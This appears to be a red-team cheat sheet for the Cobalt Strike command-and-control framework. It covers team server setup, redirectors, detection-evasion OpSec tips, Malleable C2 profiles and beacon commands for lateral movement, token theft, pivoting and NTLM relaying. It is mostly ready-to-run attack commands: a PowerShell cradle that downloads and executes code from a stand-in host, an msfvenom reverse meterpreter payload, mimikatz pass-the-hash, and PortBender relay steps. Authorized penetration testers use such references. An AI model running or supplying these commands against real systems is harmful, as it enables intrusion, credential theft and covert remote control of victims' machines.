Skip to content

Cobalt Strike

Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs. Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful graphical user interface that encourages collaboration and reports all activity.

$ sudo apt-get update
$ sudo apt-get install openjdk-11-jdk
$ sudo apt install proxychains socat
$ sudo update-java-alternatives -s java-1.11.0-openjdk-amd64
$ sudo ./teamserver 10.10.10.10 "password" [malleable C2 profile]
$ ./cobaltstrike
$ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))"

Summary

Infrastructure

Redirectors

sudo apt install socat
socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80

Domain Fronting

  • New Listener > HTTP Host Header
  • Choose a domain in "Finance & Healthcare" sector

OpSec

Don't * Use default self-signed HTTPS certificate * Use default port (50050) * Use 0.0.0.0 DNS response * Metasploit compatibility, ask for a payload : wget -U "Internet Explorer" http://127.0.0.1/vl6D

Do * Use a redirector (Apache, CDN, ...) * Firewall to only accept HTTP/S from the redirectors * Firewall 50050 and access via SSH tunnel * Edit default HTTP 404 page and Content type: text/plain * No staging set hosts_stage to false in Malleable C2 * Use Malleable Profile to taylor your attack to specific actors

Customer ID

The Customer ID is a 4-byte number associated with a Cobalt Strike license key. Cobalt Strike 3.9 and later embed this information into the payload stagers and stages generated by Cobalt Strike.

  • The Customer ID value is the last 4-bytes of a Cobalt Strike payload stager in Cobalt Strike 3.9 and later.
  • The trial has a Customer ID value of 0.
  • Cobalt Strike does not use the Customer ID value in its network traffic or other parts of the tool

Malleable C2

List of Malleable Profiles hosted on Github * Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles * Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2 * Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles * SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint

Example of syntax

set useragent "SOME AGENT"; # GOOD
set useragent 'SOME AGENT'; # BAD
prepend "This is an example;";

# Escape Double quotes
append "here is \"some\" stuff";
# Escape Backslashes
append "more \\ stuff";
# Some special characters do not need escaping
prepend "!@#$%^&*()";

Check a profile with ./c2lint. * A result of 0 is returned if c2lint completes with no errors * A result of 1 is returned if c2lint completes with only warnings * A result of 2 is returned if c2lint completes with only errors * A result of 3 is returned if c2lint completes with both errors and warning

Files

# List the file on the specified directory
beacon > ls <C:\Path>

# Change into the specified working directory
beacon > cd [directory]

# Delete a file\folder
beacon > rm [file\folder]

# File copy
beacon > cp [src] [dest]

# Download a file from the path on the Beacon host
beacon > download [C:\filePath]

# Lists downloads in progress
beacon > downloads

# Cancel a download currently in progress
beacon > cancel [*file*]

# Upload a file from the attacker to the current Beacon host
beacon > upload [/path/to/file]

Powershell and .NET

Powershell commands

# Import a Powershell .ps1 script from the control server and save it in memory in Beacon
beacon > powershell-import [/path/to/script.ps1]

# Setup a local TCP server bound to localhost and download the script imported from above using powershell.exe. Then the specified function and any arguments are executed and output is returned.
beacon > powershell [commandlet][arguments]

# Launch the given function using Unmanaged Powershell, which does not start powershell.exe. The program used is set by spawnto
beacon > powerpick [commandlet] [argument]

# Inject Unmanaged Powershell into a specific process and execute the specified command. This is useful for long-running Powershell jobs
beacon > psinject [pid][arch] [commandlet] [arguments]

.NET remote execution

Run a local .NET executable as a Beacon post-exploitation job.

Require: * Binaries compiled with the "Any CPU" configuration.

beacon > execute-assembly [/path/to/script.exe] [arguments]
beacon > execute-assembly /home/audit/Rubeus.exe
[*] Tasked beacon to run .NET program: Rubeus.exe
[+] host called home, sent: 318507 bytes
[+] received output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.4.2

Lateral Movement

⚠ OPSEC Advice: Use the spawnto command to change the process Beacon will launch for its post-exploitation jobs. The default is rundll32.exe

  • portscan: Performs a portscan on a specific target.
  • runas: A wrapper of runas.exe, using credentials you can run a command as another user.
  • pth: By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \ ❗ This module needs Administrator privileges.
  • steal_token: Steal a token from a specified process.
  • make_token: By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user.
  • jump: Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \ ❗ The jump module will use the current delegation/impersonation token to authenticate on the remote target. \ 💪 We can combine the jump module with the make_token or pth module for a quick "jump" to another target on the network.
  • remote-exec: Execute a command on a remote target using psexec, winrm or wmi. \ ❗ The remote-exec module will use the current delegation/impersonation token to authenticate on the remote target.
  • ssh/ssh-key: Authenticate using ssh with password or private key. Works for both linux and windows hosts.

⚠ All the commands launch powershell.exe

Beacon Remote Exploits
======================
jump [module] [target] [listener] 

    psexec  x86 Use a service to run a Service EXE artifact
    psexec64    x64 Use a service to run a Service EXE artifact
    psexec_psh  x86 Use a service to run a PowerShell one-liner
    winrm   x86 Run a PowerShell script via WinRM
    winrm64 x64 Run a PowerShell script via WinRM

Beacon Remote Execute Methods
=============================
remote-exec [module] [target] [command] 

    Methods                         Description
    -------                         -----------
    psexec                          Remote execute via Service Control Manager
    winrm                           Remote execute via WinRM (PowerShell)
    wmi                             Remote execute via WMI (PowerShell)

Opsec safe Pass-the-Hash: 1. mimikatz sekurlsa::pth /user:xxx /domain:xxx /ntlm:xxxx /run:"powershell -w hidden" 2. steal_token PID

Assume Control of Artifact

  • Use link to connect to SMB Beacon
  • Use connect to connect to TCP Beacon

VPN & Pivots

⚠ Covert VPN doesn't work with W10, and requires Administrator access to deploy.

Use socks 8080 to setup a SOCKS4a proxy server on port 8080 (or any other port you choose). This will setup a SOCKS proxy server to tunnel traffic through Beacon. Beacon's sleep time adds latency to any traffic you tunnel through it. Use sleep 0 to make Beacon check-in several times a second.

# Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.
beacon > socks [PORT]
beacon > socks [port]
beacon > socks [port] [socks4]
beacon > socks [port] [socks5]
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password]
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging]

# Proxy browser traffic through a specified Internet Explorer process.
beacon > browserpivot [pid] [x86|x64]

# Bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port.
beacon > rportfwd [bind port] [forward host] [forward port]

# spunnel : Spawn an agent and create a reverse port forward tunnel to its controller.    ~=  rportfwd + shspawn.
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin
beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin

# spunnel_local: Spawn an agent and create a reverse port forward, tunnelled through your Cobalt Strike client, to its controller
# then you can handle the connect back on your MSF multi handler
beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin

Beacon Object Files

A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs

Example: https://github.com/Cobalt-Strike/bof_template/blob/main/beacon.h

  • Compile 
    # To compile this with Visual Studio:
cl.exe /c /GS- hello.c /Fohello.o

# To compile this with x86 MinGW:
i686-w64-mingw32-gcc -c hello.c -o hello.o

# To compile this with x64 MinGW:
x86_64-w64-mingw32-gcc -c hello.c -o hello.o
  • Execute: inline-execute /path/to/hello.o

NTLM Relaying via Cobalt Strike

beacon> socks 1080
kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb://<IP_TARGET>
beacon> rportfwd_local 8445 <IP_KALI> 445
beacon> upload C:\Tools\PortBender\WinDivert64.sys
beacon> PortBender redirect 445 8445

References